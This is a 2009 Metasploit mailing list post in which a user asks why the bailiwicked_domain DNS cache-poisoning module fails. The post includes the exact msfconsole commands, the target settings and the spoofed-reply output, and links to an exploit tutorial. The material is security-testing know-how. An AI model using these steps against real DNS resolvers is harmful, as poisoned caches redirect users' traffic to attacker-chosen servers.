Metasploit mailing list archives
bailiwicked_domain not working anymore?
From: richard.k.miles at googlemail.com (Richard Miles)
Date: Mon, 20 Jul 2009 09:58:09 -0500
Yo I recently tested the bailiwicked_domain exploit from Metasploit against 2 different servers, and both failed the exploitation. Both servers show to be vulnerable, similar to this one output: porttest.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net. "myDNSserver is POOR: 26 queries in 1.9 seconds from 26 ports with std dev 7" I used this test: dig +short porttest.dns-oarc.net TXT @myDNSserver Both DNS servers show to be vulnerable (POOR). When exploit with Metasploit, the first problem is that "check" always fail saying my DNS doesn't accept recursive queries. msf auxiliary(bailiwicked_domain) > check [*] Using the Metasploit service to verify exploitability... [*] ERROR: This server is not replying to recursive requests That is completely wrong, my server accept recursive queries. Even if I quit metasploit or even open another terminal I can query ANY host in the internet. Is it a know problem? Well, anyway I tried to exploit the flaw, using this: msf > use auxiliary/spoof/dns/bailiwicked_domain msf auxiliary(bailiwicked_domain) > set RHOST myDNSserver RHOST => myDNSserver msf auxiliary(bailiwicked_domain) > set DOMAIN sexy.com DOMAIN => sexy.com msf auxiliary(bailiwicked_domain) > set NEWDNS www.google.com NEWDNS => www.google.com msf auxiliary(bailiwicked_domain) > set SRCPORT 0 SRCPORT => 0 msf auxiliary(bailiwicked_domain) > exploit [*] Targeting nameserver myDNSserver for injection of sexy.com. nameservers as www.google.com [*] Querying recon nameserver for sexy.com.'s nameservers... [*] Got an NS record: XXXXXXXXXXXXXXXX [*] Removed: It's just DNS resolution. [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.04/0.17/0.07 | min/max/avg replies: 4/67/28 [*] Sending 14 spoofed replies from each nameserver (3) for each query [*] Attempting to inject poison records for sexy.com.'s nameservers into myDNSserver:0... [*] Sent 1000 queries and 42000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.04/103.53/4.22 | min/max/avg replies: 3/65337/2633 [*] Now sending 1316 spoofed replies from each nameserver (3) for each query And the Metasploit keeps in this stage for a long time (at the moment, more than 1 hour). There is anything wrong with the exploit? Or I'm using it wrong? I'm following this tutorial: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt Any tips are welcome. thanks
Current thread:
- bailiwicked_domain not working anymore? Richard Miles (Jul 20)
- bailiwicked_domain not working anymore? Paolo Milani (Jul 20)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- bailiwicked_domain not working anymore? Richard Miles (Jul 20)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- Error while running meterpreter winenum script wfdawson at bellsouth.net (Jul 21)
- Error while running meterpreter winenum script Carlos PĂ©rez (Jul 21)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- bailiwicked_domain not working anymore? Paolo Milani (Jul 20)